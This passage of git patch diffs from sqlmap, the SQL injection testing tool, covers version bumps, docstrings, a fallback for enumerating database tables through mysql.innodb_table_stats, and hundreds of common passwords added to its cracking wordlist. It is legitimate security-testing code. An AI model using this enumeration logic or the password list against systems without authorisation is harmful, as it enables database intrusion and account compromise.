encoding=None): return getUnicode(retVal or "", encoding=encoding).strip() def safeVariableNaming(value): + """ + Returns escaped safe-representation of a given variable name that can be used in Python evaluated code + + >>> safeVariableNaming("foo bar") + 'foo__SAFE__20bar' + """ + return re.sub(r"[^\w]", lambda match: "%s%02x" % (SAFE_VARIABLE_MARKER, ord(match.group(0))), value) def unsafeVariableNaming(value): + """ + Returns unescaped safe-representation of a given variable name + + >>> unsafeVariableNaming("foo__SAFE__20bar") + 'foo bar' + """ + return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value) def firstNotNone(*args): + """ + Returns first not-None value from a given list of arguments + + >>> firstNotNone(None, None, 1, 2, 3) + 1 + """ + retVal = None for _ in args: diff --git a/lib/core/settings.py b/lib/core/settings.py index 84e2fcf4941..60cea71072c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.10" +VERSION = "1.2.9.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b91a5d368b5..1a646f26a7e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -30,7 +30,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py +a69c59bec0b35442139d1c29f1b05797 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -021d606c9405fd23d630108bf5c39853 lib/core/settings.py +e595397f965c89ed29d9b4b89aada743 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py diff --git a/txt/smalldict.txt b/txt/smalldict.txt index 075a14e2cbd..7e153f7be06 100644 --- a/txt/smalldict.txt +++ b/txt/smalldict.txt @@ -18,6 +18,7 @@ 01011980 01012011 010203 +0123456789 06071992 098765 0987654321 @@ -69,6 +70,7 @@ 12345678 123456789 1234567890 +12345678910 123456789a 123456789q 123456a @@ -86,6 +88,7 @@ 123asdf 123go 123qwe +124578 12axzas21a 12qwaszx 1313 @@ -96,6 +99,7 @@ 13579 1412 141414 +142536 1430 147147 147258 @@ -145,6 +149,7 @@ 1994 1996 1a2b3c +1a2b3c4d 1chris 1kitty 1p2o3i @@ -172,6 +177,7 @@ 2252 232323 242424 +246810 252525 256879 2kids @@ -179,6 +185,7 @@ 3112 3141 315475 +321321 333 3333 33333 @@ -198,6 +205,7 @@ 444444 4444444 44444444 +456123 456789 4788 4815162342 @@ -228,6 +236,7 @@ 6969 696969 69696969 +741852 741852963 753951 7654321 @@ -261,9 +270,11 @@ 999999 9999999 99999999 +999999999 a a12345 a123456 +a1234567 a1b2c3 a1b2c3d4 aa @@ -280,6 +291,7 @@ abby abc abc123 ABC123 +abc12345 abcd abcd123 abcd1234 @@ -288,6 +300,7 @@ abcdef Abcdef abcdefg Abcdefg +abcdefgh abgrtyu abigail abm @@ -330,11 +343,14 @@ agustin ahl ahm airborne +airforce airoplane +airplane airwolf ak akf7d98s2 aki123 +alabama alaska albert alberto @@ -345,6 +361,7 @@ alex1 alexande alexander alexandr +alexandra alexis Alexis alfaro @@ -373,18 +390,22 @@ altamira althea altima altima1 +always alyssa +amadeus amanda amanda1 amateur amazing amber +amelia amelie america american amigos amour ams +amsterdam amv amy anaconda @@ -394,18 +415,23 @@ andre andre1 andrea andrea1 +andreas +andres andrew andrew! Andrew andrew1 andrey andromed +andromeda andy angel angel1 angela angelica +angelina angelito +angelo angels angie angie1 @@ -432,6 +458,7 @@ apollo apollo13 apple apple1 +apple123 apple2 applepie apples @@ -495,6 +522,7 @@ asp aspateso19 aspen ass +assassin asshole assman assmunch @@ -502,12 +530,17 @@ ast asterix ath athena +atlanta +atlantis attila audiouser +audrey august august07 aurelie +aurora austin +australia autumn avalon avatar @@ -540,6 +573,7 @@ bambam bambi bamboo banana +bananas bandit bar baraka @@ -567,6 +601,7 @@ batman batman1 baxter bball +bbbbbb bc4j beach beaches @@ -593,6 +628,7 @@ becca beebop beer belgium +believe belize bella belle @@ -604,8 +640,10 @@ benji benny benoit benson +bentley beowulf berenice +berlin bernard bernardo bernie @@ -619,6 +657,7 @@ betito betsy betty bharat +bianca bic bichilora bichon @@ -658,6 +697,7 @@ birthday bis biscuit bishop +bismillah Bismillah bisounours bitch @@ -668,6 +708,7 @@ bitter biv bix biz +blabla black blackjack blah @@ -675,6 +716,7 @@ blahblah blanche blazer blessed +blessing blewis blinds blink182 @@ -693,6 +735,7 @@ bluebird blueeyes bluefish bluejean +bluemoon blues bluesky bmw @@ -734,6 +777,7 @@ boston Boston boulder bourbon +bowling boxer boxers bozo @@ -744,9 +788,11 @@ brandi brandon brandon1 brandy +brasil braves brazil brenda +brendan brent brewster brian @@ -757,6 +803,7 @@ brio_admin britain brittany Broadway +broken broker bronco broncos @@ -764,7 +811,10 @@ bronte brooke brooklyn brother +brothers +brownie bruce +brucelee brujita bruno brutus @@ -801,6 +851,7 @@ buster butch butler butter +buttercup butterfly butthead button @@ -833,6 +884,7 @@ canada cancer candy canela +cannabis cannon cannondale canon @@ -857,18 +909,22 @@ caroline carolyn carrie carrot +carson carter cartman cascade casey +casino Casio casper +cassandra cassie castle cat catalina catalog catch22 +catdog catfish catherine cathy @@ -885,7 +941,9 @@ cdemoucb cdouglas ce cecile +cecilia cedic +celeste celica celine celtic @@ -922,6 +980,7 @@ charlie Charlie charlie1 charlotte +charmed chat cheese cheese1 @@ -935,12 +994,15 @@ chester chester1 chevelle chevy +cheyenne chiara chicago +chichi chicken chicken1 chico chiefs +children china chinacat chinook @@ -963,6 +1025,8 @@ christ1 christia christian christin +christina +christine christmas christoph christopher @@ -976,6 +1040,7 @@ cinder cindy cindy1 cinema +cinnamon circuit cirque cirrus @@ -995,9 +1060,13 @@ claude claudel claudia clave +clayton cleo +cleopatra clerk cliff +clifford +clinton clipper clock cloclo @@ -1011,6 +1080,7 @@ cobra cocacola cock coco +coconut codename codeword cody @@ -1019,6 +1089,7 @@ coke colette colleen college +collins color colorado colors @@ -1066,9 +1137,11 @@ corvette corwin cosmo cosmos +cotton cougar Cougar cougars +counter country courier courtney @@ -1082,10 +1155,12 @@ craig crawford crazy cream +creation creative Creative crescent cricket +crimson cristian cristina cross @@ -1146,6 +1221,7 @@ daisy dakota dale dallas +damien dammit damogran dan @@ -1156,6 +1232,7 @@ danger daniel Daniel daniel1 +daniela danielle danny dantheman @@ -1165,6 +1242,7 @@ Darkman darkness darkside darkstar +darling darren darryl darwin @@ -1180,6 +1258,7 @@ dawn daytek dbsnmp dbvision +dddddd dead deadhead dean @@ -1192,6 +1271,7 @@ deedee deeznuts def default +defender delano delete deliver @@ -1214,6 +1294,8 @@ des des2k desert design +designer +desire deskjet desktop destiny @@ -1227,6 +1309,7 @@ dexter dharma diablo diamond +diamonds diana diane dianne @@ -1239,6 +1322,8 @@ digital dilbert dillweed dim +dingdong +dinosaur dip dipper director @@ -1246,6 +1331,7 @@ dirk dirty disco discoverer_admin +discovery disney dixie dixon @@ -1286,6 +1372,7 @@ doudou doug dougie douglas +download downtown dpfpass draft @@ -1299,6 +1386,7 @@ dreams dreamweaver driver drowssap +drpepper drummer dsgateway dssys @@ -1345,6 +1433,7 @@ einstein ejb ejsadmin ejsadmin_password +elaine electric element elephant @@ -1365,6 +1454,7 @@ e-mail emerald emily eminem +emmanuel emmitt emp empire @@ -1372,7 +1462,9 @@ enamorada energy eng engage +engineer england +english eni enigma enjoy @@ -1384,13 +1476,16 @@ eric1 erin ernie1 erotic +escape escort escort1 estefania estelle +esther Esther estore estrella +eternity etoile eugene europe @@ -1428,9 +1523,13 @@ farmer farout farside fatboy +fatcat +father +fatima faust fdsa fearless +february feedback felicidad felipe @@ -1446,14 +1545,17 @@ ferris fiction fidel Figaro +fighter fii files finance +finger finprod fiona fire fireball firebird +firefly fireman firenze first @@ -1477,6 +1579,7 @@ flight flip flipper flm +florence florida florida1 flower @@ -1502,6 +1605,7 @@ ford forest forever forever1 +forget Fortune forum forward @@ -1530,6 +1634,7 @@ frederic free freebird freedom +freedom1 freeman freepass freeuser @@ -1554,6 +1659,7 @@ frogs front242 Front242 frontier +frosty fte ftp fubar @@ -1597,6 +1703,7 @@ games gammaphi gandalf Gandalf +gangster garcia garden garfield @@ -1605,6 +1712,7 @@ gargoyle garlic garnet garou324 +garrett garth gary gasman @@ -1626,6 +1734,7 @@ gerald german germany germany1 +geronimo Geronimo getout gfhjkm @@ -1641,6 +1750,7 @@ gilgamesh gilles ginger Gingers +giovanni girl girls giselle @@ -1651,6 +1761,7 @@ gl glenn glider1 global +gloria gma gmd gme @@ -1666,6 +1777,8 @@ goaway goblin goblue gocougs +goddess +godfather godisgood godiva godslove @@ -1674,9 +1787,11 @@ goethe gofish goforit gold +goldberg golden Golden goldfish +goldie golf golfer gollum @@ -1691,10 +1806,12 @@ google goose gopher gordon +gorilla gpfd gpld gr grace +gracie graham gramps grandma @@ -1718,10 +1835,12 @@ greta gretchen Gretel gretzky +griffin grizzly groovy grover grumpy +guardian guess guest guido @@ -1748,12 +1867,16 @@ hamilton hamlet hammer Hammer +hamster +handsome hank hanna hannah +hannibal hannover23 hansolo hanson +happiness happy happy1 happy123 @@ -1764,6 +1887,7 @@ harley Harley HARLEY harley1 +harmony haro harold harriet @@ -1794,6 +1918,7 @@ helen helena helene hell +hellfire hello Hello hello1 @@ -1810,6 +1935,7 @@ henry Henry hentai herbert +hercules herman hermes hermosa @@ -1833,8 +1959,10 @@ hockey hockey1 hola holiday +holland hollister1 holly +hollywood home home123 homebrew @@ -1858,6 +1986,7 @@ horse horses hosehead hotdog +hotmail hotrod hottie house @@ -1909,6 +2038,7 @@ igi igs iguana igw +ihateyou ihavenopass ikebanaa iknowyoucanreadthis @@ -1926,13 +2056,16 @@ imageuser imagine imc imedia +immortal impact impala +imperial imt indian indiana indigo indonesia +inferno infinity info informix @@ -1965,6 +2098,7 @@ irmeli ironman isaac isabel +isabella isabelle isc island @@ -1998,6 +2132,7 @@ jan jane Janet janice +january japan jared jasmin @@ -2027,14 +2162,17 @@ jenny1 jensen jer jer2911 +jeremiah jeremy jericho +jerome jerry Jersey jesse jesse1 jessica Jessica +jessica1 jessie jester jesus @@ -2052,6 +2190,7 @@ jimbo jimbob jimi jimmy +jjjjjj jkl123 jkm jl @@ -2059,6 +2198,7 @@ jmuser joanie joanna Joanna +joanne joe joel joelle @@ -2108,10 +2248,12 @@ julie julie1 julien juliet +julius jumanji jumbo jump junebug +jungle junior juniper jupiter @@ -2121,12 +2263,16 @@ justice justice4 justin justin1 +justine juventus +kaiser kakaxaqwe kakka kalamazo kali +kamikaze kangaroo +karate karen karen1 karin @@ -2142,6 +2288,7 @@ kathy katie Katie katie1 +katrina kawasaki kayla kcin @@ -2165,6 +2312,7 @@ ketchup kevin kevin1 kevinn +keyboard khan kidder kids @@ -2176,7 +2324,9 @@ kimberly king kingdom kingfish +kingkong kings +kingston kirill kirk kissa2 @@ -2198,6 +2348,7 @@ koko kombat kramer kris +krishna kristen kristi kristin @@ -2206,6 +2357,7 @@ kristine kwalker l2ldemo lab1 +labrador labtec lacrosse laddie @@ -2217,6 +2369,8 @@ lalala lambda lamer lance +lancelot +lancer larry larry1 laser @@ -2248,6 +2402,8 @@ lemon leo leon leonard +leonardo +leopard leslie lestat lester @@ -2265,6 +2421,7 @@ library life lifehack light +lightning lights lima lincoln @@ -2298,6 +2455,7 @@ loki lol123 lola lolita +lollipop london lonely lonestar @@ -2305,6 +2463,7 @@ longer longhorn looney loren +lorenzo lori lorna lorraine @@ -2316,6 +2475,7 @@ lotus lou louis louise +loulou love love123 lovelove @@ -2327,6 +2487,7 @@ loverboy lovers loveyou loveyou1 +loving lucas lucia lucifer @@ -2346,15 +2507,18 @@ macross macse30 maddie maddog +madeline Madeline madison madman madmax madoka madonna +madrid maggie magic magic1 +magnolia magnum maiden mail @@ -2371,6 +2535,7 @@ mallorca manag3r manageme manager +manchester manolito manprod manson @@ -2388,6 +2553,9 @@ maria maria1 mariah mariah1 +marian +mariana +marianne marie marie1 marielle @@ -2398,10 +2566,12 @@ mariner marines marino mario +marion mariposa mark mark1 market +markus marlboro marley mars @@ -2411,6 +2581,8 @@ martha martin martin1 martina +martinez +martini marty marvin mary @@ -2418,6 +2590,7 @@ maryjane master Master master1 +masters math matrix matt @@ -2465,6 +2638,7 @@ mercedes mercer mercury merde +meredith merlin merlot Merlot @@ -2484,6 +2658,7 @@ miamor michael Michael michael1 +michaela michal michel Michel @@ -2503,6 +2678,7 @@ midori midvale midway migrate +miguel miguelangel mikael mike @@ -2543,6 +2719,7 @@ mnbvcxz mobile mobydick modem +mohammed moikka mojo mokito @@ -2559,6 +2736,7 @@ money1 money159 mongola monica +monika monique monisima monitor @@ -2579,6 +2757,7 @@ mookie moomoo moon moonbeam +moonlight moore moose mopar @@ -2589,10 +2768,12 @@ morgan moroni morpheus morris +morrison mort mortimer mot_de_passe mother +motherfucker motor motorola mountain @@ -2620,16 +2801,20 @@ munchkin murphy murray muscle +mushroom music mustang mustang1 mwa mxagent +mylove mypass mypassword mypc123 myriam +myself myspace1 +mystery nadia nadine naked @@ -2642,6 +2827,7 @@ napoleon naruto nascar nat +natalia nataliag natalie natasha @@ -2667,6 +2853,7 @@ nellie nelson nemesis neotix_sys +neptune nermal nesbit nesbitt @@ -2676,6 +2863,7 @@ network neutrino new newaccount +newcastle newcourt newlife newpass @@ -2695,11 +2883,13 @@ Nicholas nichole nick nicklaus +nicolas nicole nicole1 nigel nigger nigger1 +nightmare nightshadow nightwind nike @@ -2754,6 +2944,7 @@ oas_public oatmeal oaxaca obiwan +oblivion obsession ocean ocitest @@ -2775,6 +2966,7 @@ okb okc oke oki +oklahoma oko okr oks @@ -2798,6 +2990,7 @@ open openspirit openup opera +operator opi opus oracache @@ -2825,10 +3018,12 @@ ordplugins ordsys oregon oreo +original orion orlando orville oscar +osiris osm osp22 ota @@ -2836,8 +3031,10 @@ otalab otter ou812 OU812 +outlaw outln overkill +overlord owa owa_public owf_mgr @@ -2848,6 +3045,7 @@ ozp ozs ozzy pa +pa55word paagal pacers pacific @@ -2865,6 +3063,7 @@ pamela Pamela pana panama +panasonic pancake panda panda1 @@ -2874,6 +3073,7 @@ pantera panther panthers panties +panzer papa paper papito @@ -2894,9 +3094,11 @@ pass pass1 pass12 pass123 +pass1234 passion passport passw0rd +Passw0rd passwd passwo1 passwo2 @@ -2908,13 +3110,16 @@ password. Password PASSWORD password1 +Password1 password12 password123 password2 password3 +passwort pastor pat patches +patience patoclero patricia patrick @@ -2937,10 +3142,12 @@ peanuts Peanuts pearl pearljam +pebbles pedro pedro1 peekaboo peewee +pegasus peggy pekka pelirroja @@ -2966,6 +3173,7 @@ perlita perros perry person +personal perstat petalo pete @@ -2981,9 +3189,11 @@ phialpha phil philip philips +phillip phillips phish phishy +phoebe phoenix Phoenix phoenix1 @@ -3006,6 +3216,8 @@ pigeon piglet Piglet pimpin +pineapple +pingpong pink pinkfloyd piolin @@ -3026,6 +3238,7 @@ play playboy player players +playstation please plex plus @@ -3039,6 +3252,7 @@ po8 poa poetic poetry +poison poiuyt pokemon polar @@ -3083,11 +3297,16 @@ portal_demo portal_sso_ps porter portland +portugal pos +potato +potter power powercartuser +powers ppp PPP +pppppp praise prayer precious @@ -3105,8 +3324,10 @@ princess Princess princess1 print +printer printing private +prodigy prof prometheus property @@ -3133,6 +3354,7 @@ Purple pussies pussy pussy1 +pussycat pv pw123 pyramid @@ -3235,6 +3457,7 @@ razz re reality realmadrid +reaper rebecca Rebecca red @@ -3242,6 +3465,7 @@ red123 redcloud reddog redfish +redhead redman redrum redskins @@ -3252,6 +3476,7 @@ redwood reed reggae reggie +regina rejoice reliant remember @@ -3306,24 +3531,29 @@ roberto roberts robin robinhood +robinson robocop robotech robotics roche rock +rocker rocket rocket1 rockie rocknroll rockon +rockstar rocky rocky1 rodeo +rodney roger roger1 rogers roland rolex +roller rolltide roman romantico @@ -3332,6 +3562,7 @@ ronald ronaldo roni ronica +ronnie rookie rooster root123 @@ -3340,6 +3571,7 @@ rootroot rosario rose rosebud +rosemary roses rosie rosita @@ -3385,6 +3617,7 @@ sally salmon salou25 salut +salvador salvation sam samantha @@ -3401,6 +3634,7 @@ samson samsung samuel samuel22 +samurai sandi sandman sandra @@ -3425,6 +3659,7 @@ saturn Saturn saturn5 savage +savannah sbdc scarecrow scarface @@ -3471,6 +3706,7 @@ september septiembre serega serena +serenity sergei sergey sergio @@ -3492,6 +3728,7 @@ Shadow shadow1 shaggy shalom +shamrock shanghai shannon shanny @@ -3513,6 +3750,7 @@ shelley shelly shelter shelves +sherlock sherry ship shirley @@ -3520,11 +3758,13 @@ shit shithead shoes shogun +shopping shorty shorty1 shotgun Sidekick sidney +siemens sierra Sierra sigmachi @@ -3532,9 +3772,11 @@ signal signature si_informtn_schema silver +silvia simba simba1 simon +simone simple simpson simpsons @@ -3542,10 +3784,13 @@ simsim sinatra sinegra singer +single sirius +sister sister12 siteminder skate +skater skeeter Skeeter skibum @@ -3555,6 +3800,7 @@ skip skipper skipper1 skippy +skittles skull skunk skydive @@ -3607,10 +3853,13 @@ sober1 soccer soccer1 soccer2 +socrates softball +software soledad soleil solomon +something sonic sonics sonny @@ -3624,13 +3873,16 @@ soyhermosa space spain spanky +sparkle sparks sparky Sparky sparrow spartan spazz +speaker special +spectrum speedo speedy Speedy @@ -3658,6 +3910,7 @@ spurs sql sqlexec squash +squirrel squirt srinivas ssp @@ -3666,10 +3919,14 @@ ssssss stacey stalker stan +standard stanley star star69 starbuck +starcraft +stardust +starfish stargate starlight stars @@ -3682,6 +3939,7 @@ stealth steel steele steelers +stefan stella steph steph1 @@ -3689,6 +3947,7 @@ stephani stephanie stephen stephi +sterling Sterling steve steve1 @@ -3706,6 +3965,7 @@ stinky stivers stocks stone +stones storage storm stormy @@ -3714,7 +3974,9 @@ strat strato strat_passwd strawberry +street stretch +strike strong stuart stud @@ -3731,6 +3993,7 @@ suckme sudoku sue sugar +sullivan sultan summer Summer @@ -3776,6 +4039,7 @@ svetlana swanson sweden sweet +sweetheart sweetie sweetpea sweety @@ -3789,6 +4053,7 @@ swordfish swpro swuser sydney +sylvester sylvia sylvie symbol @@ -3845,6 +4110,7 @@ teflon tekila telecom telefono +telephone temp temp! temp123 @@ -3858,6 +4124,7 @@ tequiero tequila teresa terminal +terminator terry terry1 test @@ -3874,6 +4141,7 @@ testpilot testtest test_user texas +thailand thankyou the theatre @@ -3884,6 +4152,7 @@ thejudge theking thelorax theman +theodore theresa Theresa therock @@ -3934,8 +4203,10 @@ toby today tokyo tom +tomato tomcat tommy +tomtom tony tool tootsie @@ -3970,6 +4241,8 @@ trevor tricia tricky trident +trigger +trinidad trinity trish tristan @@ -3977,11 +4250,13 @@ triton trixie trojan trombone +trooper trophy trouble trout truck trucker +truelove truman trumpet trustno1 @@ -3996,10 +4271,13 @@ turbine turbo turbo2 turkey +turner turtle tweety tweety1 +twilight twins +twister twitter tybnoq tyler @@ -4008,12 +4286,15 @@ ultimate um_admin um_client undead +undertaker underworld unicorn unicornio unique united unity +universal +universe universidad unix unknown @@ -4038,6 +4319,7 @@ vacation vader vagina val +valencia valentin valentina valentinchoque @@ -4088,12 +4370,14 @@ viper viper1 virago virgil +virgin virginia virus viruser visa vision visual +vivian vladimir volcano volley @@ -4107,6 +4391,7 @@ waiting walden waldo walker +wallace walleye wally walter @@ -4117,6 +4402,7 @@ warner warren warrior warriors +washington water water1 Waterloo @@ -4134,9 +4420,11 @@ Webster wedge weezer welcome +welcome1 welcome123 wendy wendy1 +werewolf wesley west western @@ -4153,6 +4441,7 @@ whitney whocares whoville wibble +wicked wiesenhof wilbur wildcat @@ -4208,12 +4497,14 @@ Woodrow woody woofwoof word +wordpass work123 world World worship wps wrangler +wrestling wright writer writing From ec253dd5bdd0a799d5976efb923ca785d3bab7f6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 7 Sep 2018 11:53:43 +0200 Subject: [PATCH 270/428] Support for table name retrieval from mysql.innodb_table_stats (fallback if primary fails) --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 32 ++++++++++++++++++-------------- txt/checksum.md5 | 6 +++--- xml/queries.xml | 4 ++-- 4 files changed, 24 insertions(+), 20 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 60cea71072c..18cb2f44fa3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.11" +VERSION = "1.2.9.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index c399ed13744..a8edb98b829 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -261,24 +261,28 @@ def getTables(self, bruteForce=None): rootQuery = queries[Backend.getIdentifiedDbms()].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None + values = [] - if condition: - if not Backend.isDbms(DBMS.SQLITE): - query += " WHERE %s" % condition + for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, "condition", None)), (getattr(rootQuery.inband, "query2", None), getattr(rootQuery.inband, "condition2", None))): + if not isNoneValue(values) or not query: + break - if conf.excludeSysDbs: - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg) - query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) - else: - query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) + if condition: + if not Backend.isDbms(DBMS.SQLITE): + query += " WHERE %s" % condition - if len(dbs) < 2 and ("%s," % condition) in query: - query = query.replace("%s," % condition, "", 1) + if conf.excludeSysDbs: + infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(infoMsg) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) + else: + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) - values = inject.getValue(query, blind=False, time=False) + if len(dbs) < 2 and ("%s," % condition) in query: + query = query.replace("%s," % condition, "", 1) + + if query: + values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): values = filter(None, arrayizeValue(values)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1a646f26a7e..c91220820d4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e595397f965c89ed29d9b4b89aada743 lib/core/settings.py +39a71984ff7fd683d06c489f33d477a7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -207,7 +207,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py +2e0c1c5ced14222d9fef2dd12447d815 plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py @@ -478,4 +478,4 @@ fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -a5eecbca03800851635817e0ca832a92 xml/queries.xml +b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 642182b7a62..7278fb08523 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -46,8 +46,8 @@ - - + + From 63b84c31e5e55fa1005ce4f524a3b8f3c4a42987 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 8 Sep 2018 23:36:08 +0200 Subject: [PATCH 271/428] Update regarding the #3229 --- lib/core/settings.py | 2 +- lib/utils/versioncheck.py | 14 +++++++++----- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 18cb2f44fa3..51c44ce1bb5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.12" +VERSION = "1.2.9.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index 4cbecb0dc72..f57ea0682e8 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -12,12 +12,16 @@ if PYVERSION >= "3" or PYVERSION < "2.6": exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) +errors = [] extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") -try: - for _ in extensions: +for _ in extensions: + try: __import__(_) -except ImportError: - errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) + except ImportError: + errors.append(_) + +if errors: + errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in errors)) errMsg += "most likely because current version of Python has been " - errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" + errMsg += "built without appropriate dev packages" exit(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c91220820d4..86c7c7d17e7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -39a71984ff7fd683d06c489f33d477a7 lib/core/settings.py +20762b473b8d387b6f2d6b13aafb0ff1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -118,7 +118,7 @@ d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py +faa7536c4788ee118b19338f3e98e556 lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py From c36749c3bbf5db222c936e7ecf5b048de70d6a1e Mon Sep 17 00:00:00 2001 From: Ehsan Nezami Date: Mon, 10 Sep 2018 01:26:28 -0700 Subject: [PATCH 